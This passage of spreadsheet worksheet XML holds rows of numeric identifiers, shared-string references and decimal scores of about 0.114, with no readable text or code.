      <c r="D3872" s="2">
        <v>1.0</v>
      </c>
      <c r="E3872" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3872" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3873" ht="15.75" customHeight="1">
      <c r="A3873" s="1">
        <v>11637.0</v>
      </c>
      <c r="B3873" s="2">
        <v>2.3186337E7</v>
      </c>
      <c r="C3873" s="2" t="s">
        <v>3669</v>
      </c>
      <c r="D3873" s="2">
        <v>1.0</v>
      </c>
      <c r="E3873" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3873" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3874" ht="15.75" customHeight="1">
      <c r="A3874" s="1">
        <v>11729.0</v>
      </c>
      <c r="B3874" s="2">
        <v>2.3952495E7</v>
      </c>
      <c r="C3874" s="2" t="s">
        <v>3670</v>
      </c>
      <c r="D3874" s="2">
        <v>1.0</v>
      </c>
      <c r="E3874" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3874" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3875" ht="15.75" customHeight="1">
      <c r="A3875" s="1">
        <v>12188.0</v>
      </c>
      <c r="B3875" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C3875" s="2" t="s">
        <v>3671</v>
      </c>
      <c r="D3875" s="2">
        <v>1.0</v>
      </c>
      <c r="E3875" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3875" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3876" ht="15.75" customHeight="1">
      <c r="A3876" s="1">
        <v>12316.0</v>
      </c>
      <c r="B3876" s="2">
        <v>2.8433435E7</v>
      </c>
      <c r="C3876" s="2" t="s">
        <v>3672</v>
      </c>
      <c r="D3876" s="2">
        <v>1.0</v>
      </c>
      <c r="E3876" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3876" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3877" ht="15.75" customHeight="1">
      <c r="A3877" s="1">
        <v>12321.0</v>
      </c>
      <c r="B3877" s="2">
        <v>2.8488391E7</v>
      </c>
      <c r="C3877" s="2" t="s">
        <v>3673</v>
      </c>
      <c r="D3877" s="2">
        <v>1.0</v>
      </c>
      <c r="E3877" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3877" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3878" ht="15.75" customHeight="1">
      <c r="A3878" s="1">
        <v>12332.0</v>
      </c>
      <c r="B3878" s="2">
        <v>2.8551735E7</v>
      </c>
      <c r="C3878" s="2" t="s">
        <v>3674</v>
      </c>
      <c r="D3878" s="2">
        <v>1.0</v>
      </c>
      <c r="E3878" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3878" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3879" ht="15.75" customHeight="1">
      <c r="A3879" s="1">
        <v>12337.0</v>
      </c>
      <c r="B3879" s="2">
        <v>2.8589488E7</v>
      </c>
      <c r="C3879" s="2" t="s">
        <v>3675</v>
      </c>
      <c r="D3879" s="2">
        <v>1.0</v>
      </c>
      <c r="E3879" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3879" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3880" ht="15.75" customHeight="1">
      <c r="A3880" s="1">
        <v>13003.0</v>
      </c>
      <c r="B3880" s="2">
        <v>3.2813116E7</v>
      </c>
      <c r="C3880" s="2" t="s">
        <v>3676</v>
      </c>
      <c r="D3880" s="2">
        <v>1.0</v>
      </c>
      <c r="E3880" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3880" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3881" ht="15.75" customHeight="1">
      <c r="A3881" s="1">
        <v>13222.0</v>
      </c>
      <c r="B3881" s="2">
        <v>3.4220106E7</v>
      </c>
      <c r="C3881" s="2" t="s">
        <v>3677</v>
      </c>
      <c r="D3881" s="2">
        <v>1.0</v>
      </c>
      <c r="E3881" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3881" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3882" ht="15.75" customHeight="1">
      <c r="A3882" s="1">
        <v>14054.0</v>
      </c>
      <c r="B3882" s="2">
        <v>3.753594E7</v>
      </c>
      <c r="C3882" s="2" t="s">
        <v>3678</v>
      </c>
      <c r="D3882" s="2">
        <v>1.0</v>
      </c>
      <c r="E3882" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3882" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3883" ht="15.75" customHeight="1">
      <c r="A3883" s="1">
        <v>14436.0</v>
      </c>
      <c r="B3883" s="2">
        <v>3.9283289E7</v>
      </c>
      <c r="C3883" s="2" t="s">
        <v>3679</v>
      </c>
      <c r="D3883" s="2">
        <v>1.0</v>
      </c>
      <c r="E3883" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3883" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3884" ht="15.75" customHeight="1">
      <c r="A3884" s="1">
        <v>14493.0</v>
      </c>
      <c r="B3884" s="2">
        <v>3.9629429E7</v>
      </c>
      <c r="C3884" s="2" t="s">
        <v>3680</v>
      </c>
      <c r="D3884" s="2">
        <v>1.0</v>
      </c>
      <c r="E3884" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3884" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3885" ht="15.75" customHeight="1">
      <c r="A3885" s="1">
        <v>14558.0</v>
      </c>
      <c r="B3885" s="2">
        <v>4.0030408E7</v>
      </c>
      <c r="C3885" s="2" t="s">
        <v>3681</v>
      </c>
      <c r="D3885" s="2">
        <v>1.0</v>
      </c>
      <c r="E3885" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3885" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3886" ht="15.75" customHeight="1">
      <c r="A3886" s="1">
        <v>14590.0</v>
      </c>
      <c r="B3886" s="2">
        <v>4.0171525E7</v>
      </c>
      <c r="C3886" s="2" t="s">
        <v>3682</v>
      </c>
      <c r="D3886" s="2">
        <v>1.0</v>
      </c>
      <c r="E3886" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3886" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3887" ht="15.75" customHeight="1">
      <c r="A3887" s="1">
        <v>14597.0</v>
      </c>
      <c r="B3887" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C3887" s="2" t="s">
        <v>3683</v>
      </c>
      <c r="D3887" s="2">
        <v>1.0</v>
      </c>
      <c r="E3887" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3887" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3888" ht="15.75" customHeight="1">
      <c r="A3888" s="1">
        <v>14675.0</v>
      </c>
      <c r="B3888" s="2">
        <v>4.045512E7</v>
      </c>
      <c r="C3888" s="2" t="s">
        <v>3684</v>
      </c>
      <c r="D3888" s="2">
        <v>1.0</v>
      </c>
      <c r="E3888" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3888" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3889" ht="15.75" customHeight="1">
      <c r="A3889" s="1">
        <v>14723.0</v>
      </c>
      <c r="B3889" s="2">
        <v>4.066276E7</v>
      </c>
      <c r="C3889" s="2" t="s">
        <v>3685</v>
      </c>
      <c r="D3889" s="2">
        <v>1.0</v>
      </c>
      <c r="E3889" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3889" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3890" ht="15.75" customHeight="1">
      <c r="A3890" s="1">
        <v>15088.0</v>
      </c>
      <c r="B3890" s="2">
        <v>4.1779336E7</v>
      </c>
      <c r="C3890" s="2" t="s">
        <v>3686</v>
      </c>
      <c r="D3890" s="2">
        <v>1.0</v>
      </c>
      <c r="E3890" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3890" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3891" ht="15.75" customHeight="1">
      <c r="A3891" s="1">
        <v>15395.0</v>
      </c>
      <c r="B3891" s="2">
        <v>4.2817627E7</v>
      </c>
      <c r="C3891" s="2" t="s">
        <v>3687</v>
      </c>
      <c r="D3891" s="2">
        <v>1.0</v>
      </c>
      <c r="E3891" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3891" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3892" ht="15.75" customHeight="1">
      <c r="A3892" s="1">
        <v>15766.0</v>
      </c>
      <c r="B3892" s="2">
        <v>4.4179143E7</v>
      </c>
      <c r="C3892" s="2" t="s">
        <v>3688</v>
      </c>
      <c r="D3892" s="2">
        <v>1.0</v>
      </c>
      <c r="E3892" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3892" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3893" ht="15.75" customHeight="1">
      <c r="A3893" s="1">
        <v>15933.0</v>
      </c>
      <c r="B3893" s="2">
        <v>4.4716444E7</v>
      </c>
      <c r="C3893" s="2" t="s">
        <v>3689</v>
      </c>
      <c r="D3893" s="2">
        <v>1.0</v>
      </c>
      <c r="E3893" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3893" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3894" ht="15.75" customHeight="1">
      <c r="A3894" s="1">
        <v>16019.0</v>
      </c>
      <c r="B3894" s="2">
        <v>4.5026359E7</v>
      </c>
      <c r="C3894" s="2" t="s">
        <v>3690</v>
      </c>
      <c r="D3894" s="2">
        <v>1.0</v>
      </c>
      <c r="E3894" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3894" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3895" ht="15.75" customHeight="1">
      <c r="A3895" s="1">
        <v>16292.0</v>
      </c>
      <c r="B3895" s="2">
        <v>4.5829346E7</v>
      </c>
      <c r="C3895" s="2" t="s">
        <v>3691</v>
      </c>
      <c r="D3895" s="2">
        <v>1.0</v>
      </c>
      <c r="E3895" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3895" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3896" ht="15.75" customHeight="1">
      <c r="A3896" s="1">
        <v>17136.0</v>
      </c>
      <c r="B3896" s="2">
        <v>4.8829547E7</v>
      </c>
      <c r="C3896" s="2" t="s">
        <v>3692</v>
      </c>
      <c r="D3896" s="2">
        <v>1.0</v>
      </c>
      <c r="E3896" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3896" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3897" ht="15.75" customHeight="1">
      <c r="A3897" s="1">
        <v>17250.0</v>
      </c>
      <c r="B3897" s="2">
        <v>4.9100882E7</v>
      </c>
      <c r="C3897" s="2" t="s">
        <v>3693</v>
      </c>
      <c r="D3897" s="2">
        <v>1.0</v>
      </c>
      <c r="E3897" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3897" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3898" ht="15.75" customHeight="1">
      <c r="A3898" s="1">
        <v>17283.0</v>
      </c>
      <c r="B3898" s="2">
        <v>4.9211592E7</v>
      </c>
      <c r="C3898" s="2" t="s">
        <v>3694</v>
      </c>
      <c r="D3898" s="2">
        <v>1.0</v>
      </c>
      <c r="E3898" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3898" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3899" ht="15.75" customHeight="1">
      <c r="A3899" s="1">
        <v>17293.0</v>
      </c>
      <c r="B3899" s="2">
        <v>4.9247136E7</v>
      </c>
      <c r="C3899" s="2" t="s">
        <v>3695</v>
      </c>
      <c r="D3899" s="2">
        <v>1.0</v>
      </c>
      <c r="E3899" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3899" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3900" ht="15.75" customHeight="1">
      <c r="A3900" s="1">
        <v>17371.0</v>
      </c>
      <c r="B3900" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C3900" s="2" t="s">
        <v>3696</v>
      </c>
      <c r="D3900" s="2">
        <v>1.0</v>
      </c>
      <c r="E3900" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3900" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3901" ht="15.75" customHeight="1">
      <c r="A3901" s="1">
        <v>17381.0</v>
      </c>
      <c r="B3901" s="2">
        <v>4.9546302E7</v>
      </c>
      <c r="C3901" s="2" t="s">
        <v>3697</v>
      </c>
      <c r="D3901" s="2">
        <v>1.0</v>
      </c>
      <c r="E3901" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3901" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3902" ht="15.75" customHeight="1">
      <c r="A3902" s="1">
        <v>19637.0</v>
      </c>
      <c r="B3902" s="2">
        <v>5.6282151E7</v>
      </c>
      <c r="C3902" s="2" t="s">
        <v>3698</v>
      </c>
      <c r="D3902" s="2">
        <v>1.0</v>
      </c>
      <c r="E3902" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3902" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3903" ht="15.75" customHeight="1">
      <c r="A3903" s="1">
        <v>19851.0</v>
      </c>
      <c r="B3903" s="2">
        <v>5.7125129E7</v>
      </c>
      <c r="C3903" s="2" t="s">
        <v>3699</v>
      </c>
      <c r="D3903" s="2">
        <v>1.0</v>
      </c>
      <c r="E3903" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3903" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3904" ht="15.75" customHeight="1">
      <c r="A3904" s="1">
        <v>20272.0</v>
      </c>
      <c r="B3904" s="2">
        <v>1.111776E7</v>
      </c>
      <c r="C3904" s="2" t="s">
        <v>3700</v>
      </c>
      <c r="D3904" s="2">
        <v>1.0</v>
      </c>
      <c r="E3904" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3904" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3905" ht="15.75" customHeight="1">
      <c r="A3905" s="1">
        <v>20937.0</v>
      </c>
      <c r="B3905" s="2">
        <v>1.6464153E7</v>
      </c>
      <c r="C3905" s="2" t="s">
        <v>3701</v>
      </c>
      <c r="D3905" s="2">
        <v>1.0</v>
      </c>
      <c r="E3905" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3905" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3906" ht="15.75" customHeight="1">
      <c r="A3906" s="1">
        <v>24961.0</v>
      </c>
      <c r="B3906" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C3906" s="2" t="s">
        <v>3702</v>
      </c>
      <c r="D3906" s="2">
        <v>1.0</v>
      </c>
      <c r="E3906" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3906" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3907" ht="15.75" customHeight="1">
      <c r="A3907" s="1">
        <v>25439.0</v>
      </c>
      <c r="B3907" s="2">
        <v>1.38746E7</v>
      </c>
      <c r="C3907" s="2" t="s">
        <v>3703</v>
      </c>
      <c r="D3907" s="2">
        <v>1.0</v>
      </c>
      <c r="E3907" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3907" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3908" ht="15.75" customHeight="1">
      <c r="A3908" s="1">
        <v>25772.0</v>
      </c>
      <c r="B3908" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C3908" s="2" t="s">
        <v>3704</v>
      </c>
      <c r="D3908" s="2">
        <v>1.0</v>
      </c>
      <c r="E3908" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3908" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3909" ht="15.75" customHeight="1">
      <c r="A3909" s="1">
        <v>26477.0</v>
      </c>
      <c r="B3909" s="2">
        <v>1.7442472E7</v>
      </c>
      <c r="C3909" s="2" t="s">
        <v>3705</v>
      </c>
      <c r="D3909" s="2">
        <v>1.0</v>
      </c>
      <c r="E3909" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3909" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3910" ht="15.75" customHeight="1">
      <c r="A3910" s="1">
        <v>27142.0</v>
      </c>
      <c r="B3910" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C3910" s="2" t="s">
        <v>3706</v>
      </c>
      <c r="D3910" s="2">
        <v>1.0</v>
      </c>
      <c r="E3910" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3910" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3911" ht="15.75" customHeight="1">
      <c r="A3911" s="1">
        <v>28269.0</v>
      </c>
      <c r="B3911" s="2">
        <v>2.5377367E7</v>
      </c>
      <c r="C3911" s="2" t="s">
        <v>3707</v>
      </c>
      <c r="D3911" s="2">
        <v>1.0</v>
      </c>
      <c r="E3911" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3911" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3912" ht="15.75" customHeight="1">
      <c r="A3912" s="1">
        <v>28588.0</v>
      </c>
      <c r="B3912" s="2">
        <v>2.6949546E7</v>
      </c>
      <c r="C3912" s="2" t="s">
        <v>3708</v>
      </c>
      <c r="D3912" s="2">
        <v>1.0</v>
      </c>
      <c r="E3912" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3912" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3913" ht="15.75" customHeight="1">
      <c r="A3913" s="1">
        <v>29922.0</v>
      </c>
      <c r="B3913" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C3913" s="2" t="s">
        <v>3709</v>
      </c>
      <c r="D3913" s="2">
        <v>1.0</v>
      </c>
      <c r="E3913" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3913" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3914" ht="15.75" customHeight="1">
      <c r="A3914" s="1">
        <v>30249.0</v>
      </c>
      <c r="B3914" s="2">
        <v>3.7561811E7</v>
      </c>
      <c r="C3914" s="2" t="s">
        <v>3710</v>
      </c>
      <c r="D3914" s="2">
        <v>1.0</v>
      </c>
      <c r="E3914" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3914" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3915" ht="15.75" customHeight="1">
      <c r="A3915" s="1">
        <v>30567.0</v>
      </c>
      <c r="B3915" s="2">
        <v>4.0958475E7</v>
      </c>
      <c r="C3915" s="2" t="s">
        <v>3711</v>
      </c>
      <c r="D3915" s="2">
        <v>1.0</v>
      </c>
      <c r="E3915" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3915" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3916" ht="15.75" customHeight="1">
      <c r="A3916" s="1">
        <v>31571.0</v>
      </c>
      <c r="B3916" s="2">
        <v>5122648.0</v>
      </c>
      <c r="C3916" s="2" t="s">
        <v>3712</v>
      </c>
      <c r="D3916" s="2">
        <v>1.0</v>
      </c>
      <c r="E3916" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3916" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="3917" ht="15.75" customHeight="1">
      <c r="A3917" s="1">
        <v>7495.0</v>
      </c>
      <c r="B3917" s="2">
        <v>5.1381535E7</v>
      </c>
      <c r="C3917" s="2" t="s">
        <v>3713</v>
      </c>
      <c r="D3917" s="2">
        <v>1.0</v>
      </c>
      <c r="E3917" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3917" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="3918" ht="15.75" customHeight="1">
      <c r="A3918" s="1">
        <v>8575.0</v>
      </c>
      <c r="B3918" s="2">
        <v>5.4212289E7</v>
      </c>
      <c r="C3918" s="2" t="s">
        <v>3714</v>
      </c>
      <c r="D3918" s="2">
        <v>1.0</v>
      </c>
      <c r="E3918" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3918" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="3919" ht="15.75" customHeight="1">
      <c r="A3919" s="1">
        <v>9194.0</v>
      </c>
      <c r="B3919" s="2">
        <v>5.5394838E7</v>
      </c>
      <c r="C3919" s="2" t="s">
        <v>3715</v>
      </c>
      <c r="D3919" s="2">
        <v>1.0</v>
      </c>
      <c r="E3919" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3919" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="3920" ht="15.75" customHeight="1">
      <c r="A3920" s="1">
        <v>10186.0</v>
      </c>
      <c r="B3920" s="2">
        <v>5.7385847E7</v>
      </c>
      <c r="C3920" s="2" t="s">
        <v>3716</v>
      </c>
      <c r="D3920" s="2">
        <v>1.0</v>
      </c>
      <c r="E3920" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3920" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="3921" ht="15.75" customHeight="1">
      <c r="A3921" s="1">
        <v>10786.0</v>
      </c>
      <c r="B3921" s="2">
        <v>1.5670231E7</v>
      </c>
      <c r="C3921" s="2" t="s">
        <v>3717</v>
      </c>
      <c r="D3921" s="2">
        <v>1.0</v>
      </c>
      <c r="E3921" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3921" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="3922" ht="15.75" customHeight="1">
      <c r="A3922" s="1">
        <v>9951.0</v>
      </c>
      <c r="B3922" s="2">
        <v>5.6892986E7</v>
      </c>
      <c r="C3922" s="2" t="s">
        <v>3718</v>
      </c>
      <c r="D3922" s="2">
        <v>1.0</v>
      </c>
      <c r="E3922" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3922" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="3923" ht="15.75" customHeight="1">
      <c r="A3923" s="1">
        <v>11871.0</v>
      </c>
      <c r="B3923" s="2">
        <v>2.4921318E7</v>
      </c>
      <c r="C3923" s="2" t="s">
        <v>3719</v>
      </c>
      <c r="D3923" s="2">
        <v>1.0</v>
      </c>
      <c r="E3923" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3923" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="3924" ht="15.75" customHeight="1">
      <c r="A3924" s="1">
        <v>12776.0</v>
      </c>
      <c r="B3924" s="2">
        <v>3.1303001E7</v>
      </c>
      <c r="C3924" s="2" t="s">
        <v>3720</v>
      </c>
      <c r="D3924" s="2">
        <v>1.0</v>
      </c>
      <c r="E3924" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3924" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="3925" ht="15.75" customHeight="1">
      <c r="A3925" s="1">
        <v>18227.0</v>
      </c>
      <c r="B3925" s="2">
        <v>5.2106152E7</v>
      </c>
      <c r="C3925" s="2" t="s">
        <v>3721</v>
      </c>
      <c r="D3925" s="2">
        <v>1.0</v>
      </c>
      <c r="E3925" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3925" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="3926" ht="15.75" customHeight="1">
      <c r="A3926" s="1">
        <v>22567.0</v>
      </c>
      <c r="B3926" s="2">
        <v>3.8487295E7</v>
      </c>
      <c r="C3926" s="2" t="s">
        <v>3546</v>
      </c>
      <c r="D3926" s="2">
        <v>1.0</v>
      </c>
      <c r="E3926" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3926" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="3927" ht="15.75" customHeight="1">
      <c r="A3927" s="1">
        <v>3247.0</v>
      </c>
      <c r="B3927" s="2">
        <v>3.7384223E7</v>
      </c>
      <c r="C3927" s="2" t="s">
        <v>3722</v>
      </c>
      <c r="D3927" s="2">
        <v>1.0</v>
      </c>
      <c r="E3927" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3927" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="3928" ht="15.75" customHeight="1">
      <c r="A3928" s="1">
        <v>11269.0</v>
      </c>
      <c r="B3928" s="2">
        <v>2.0722892E7</v>
      </c>
      <c r="C3928" s="2" t="s">
        <v>3723</v>
      </c>
      <c r="D3928" s="2">
        <v>1.0</v>
      </c>
      <c r="E3928" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3928" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="3929" ht="15.75" customHeight="1">
      <c r="A3929" s="1">
        <v>13471.0</v>
      </c>
      <c r="B3929" s="2">
        <v>3.5253582E7</v>
      </c>
      <c r="C3929" s="2" t="s">
        <v>3724</v>
      </c>
      <c r="D3929" s="2">
        <v>1.0</v>
      </c>
      <c r="E3929" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3929" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="3930" ht="15.75" customHeight="1">
      <c r="A3930" s="1">
        <v>1621.0</v>
      </c>
      <c r="B3930" s="2">
        <v>2.7909666E7</v>
      </c>
      <c r="C3930" s="2" t="s">
        <v>3725</v>
      </c>
      <c r="D3930" s="2">
        <v>1.0</v>
      </c>
      <c r="E3930" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3930" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="3931" ht="15.75" customHeight="1">
      <c r="A3931" s="1">
        <v>12739.0</v>
      </c>
      <c r="B3931" s="2">
        <v>3.1050828E7</v>
      </c>
      <c r="C3931" s="2" t="s">
        <v>3726</v>
      </c>
      <c r="D3931" s="2">
        <v>1.0</v>
      </c>
      <c r="E3931" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3931" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="3932" ht="15.75" customHeight="1">
      <c r="A3932" s="1">
        <v>28334.0</v>
      </c>
      <c r="B3932" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C3932" s="2" t="s">
        <v>3727</v>
      </c>
      <c r="D3932" s="2">
        <v>1.0</v>
      </c>
      <c r="E3932" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3932" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="3933" ht="15.75" customHeight="1">
      <c r="A3933" s="1">
        <v>1503.0</v>
      </c>
      <c r="B3933" s="2">
        <v>2.7269865E7</v>
      </c>
      <c r="C3933" s="2" t="s">
        <v>3728</v>
      </c>
      <c r="D3933" s="2">
        <v>1.0</v>
      </c>
      <c r="E3933" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3933" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="3934" ht="15.75" customHeight="1">
      <c r="A3934" s="1">
        <v>31210.0</v>
      </c>
      <c r="B3934" s="2">
        <v>4924550.0</v>
      </c>
      <c r="C3934" s="2" t="s">
        <v>3729</v>
      </c>
      <c r="D3934" s="2">
        <v>1.0</v>
      </c>
      <c r="E3934" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3934" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="3935" ht="15.75" customHeight="1">
      <c r="A3935" s="1">
        <v>1753.0</v>
      </c>
      <c r="B3935" s="2">
        <v>2.8873372E7</v>
      </c>
      <c r="C3935" s="2" t="s">
        <v>3730</v>
      </c>
      <c r="D3935" s="2">
        <v>1.0</v>
      </c>
      <c r="E3935" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3935" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="3936" ht="15.75" customHeight="1">
      <c r="A3936" s="1">
        <v>5272.0</v>
      </c>
      <c r="B3936" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C3936" s="2" t="s">
        <v>3731</v>
      </c>
      <c r="D3936" s="2">
        <v>1.0</v>
      </c>
      <c r="E3936" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3936" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="3937" ht="15.75" customHeight="1">
      <c r="A3937" s="1">
        <v>1710.0</v>
      </c>
      <c r="B3937" s="2">
        <v>2.8572219E7</v>
      </c>
      <c r="C3937" s="2" t="s">
        <v>3732</v>
      </c>
      <c r="D3937" s="2">
        <v>1.0</v>
      </c>
      <c r="E3937" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3937" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="3938" ht="15.75" customHeight="1">
      <c r="A3938" s="1">
        <v>19790.0</v>
      </c>
      <c r="B3938" s="2">
        <v>5.6818825E7</v>
      </c>
      <c r="C3938" s="2" t="s">
        <v>3733</v>
      </c>
      <c r="D3938" s="2">
        <v>1.0</v>
      </c>
      <c r="E3938" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3938" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="3939" ht="15.75" customHeight="1">
      <c r="A3939" s="1">
        <v>11999.0</v>
      </c>
      <c r="B3939" s="2">
        <v>2.5952413E7</v>
      </c>
      <c r="C3939" s="2" t="s">
        <v>3734</v>
      </c>
